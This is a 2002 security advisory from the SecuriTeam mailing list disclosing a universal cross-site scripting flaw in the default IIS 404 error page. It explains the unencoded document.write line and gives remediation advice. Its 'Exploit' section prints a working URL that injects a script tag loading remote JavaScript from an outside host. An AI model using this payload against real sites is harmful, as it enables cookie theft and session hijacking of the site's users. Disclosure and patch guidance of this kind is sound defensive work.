[NT] IIS Allows Universal Cross Site Scripting

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 10 Apr 2002 23:53:08 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  IIS Allows Universal Cross Site Scripting
------------------------------------------------------------------------

SUMMARY

Cross-site scripting (XSS; at the time of this advisory often abbreviated CSS)
is the injection of script code into pages served by a foreign site. A typical
scenario is an attacker injecting code into a page on, e.g., hotmail.com to
steal a victim's cookies, allowing him/her to hijack the victim's e-mail
account. The default installation of IIS is susceptible to such an error.

DETAILS

Vulnerable systems:
 * IIS version 4
 * IIS version 5
 * IIS version 5.1

Impact:
Stealing cookies from any IIS site, cross-domain scripting to any IIS
site, hijacking Hotmail and Passport accounts, elevating privileges
through ActiveX components, hijacking the MSN Messenger client, etc.

Details:
Every time IIS encounters an HTTP 404 error code it displays a "404 not
found" page. The HTML file behind this page uses client-side script to output
a link to the SERVER.TLD part of the requested URL, and by constructing a
specially formed URL it is possible to include arbitrary script commands on
the 404 page, thereby enabling cross-site scripting on any IIS site. If we
look at 404.htm, we notice one particular line of code:

document.write( '<A HREF="' + escape(urlresult) + '">' + displayresult + "</a>");

displayresult is taken from the first occurrence of :// in the URL up to the
next /, and it is written into the page without any encoding (escape() is
only applied to the href). This means our script code has to appear before
the path part of the URL. To accomplish this we place the script code in the
Basic Authentication (user-info) part of the URL, but we first have to escape
any special characters in it: any / character would end displayresult
prematurely, and any space would break the URL before the host is ever looked
up, so we replace each space with a TAB (%09) and each / with %5Cx2f (the
JScript string escape \x2f, which the script engine turns back into / when
the handler runs, since we will dynamically reference an external file).

Exploit:
http://=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/SomeNonExistantPath

The above will include and execute http://jscript.dk/test.js on YOUR.TLD,
where YOUR.TLD is served by an IIS installation.

Solution:
Apply the MS02-018 patch (see http://jscript.dk/adv/TL001/#links), or delete
the default 404 error-handler page. You could also use the opportunity to
create a custom 404 error-handler page, one that does not write the request
URL into the page unencoded. End-users can enable the "Show friendly HTTP
error messages" option in IE.

ADDITIONAL INFORMATION

The information has been provided by Thor Larholm <Thor@jubii.dk>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


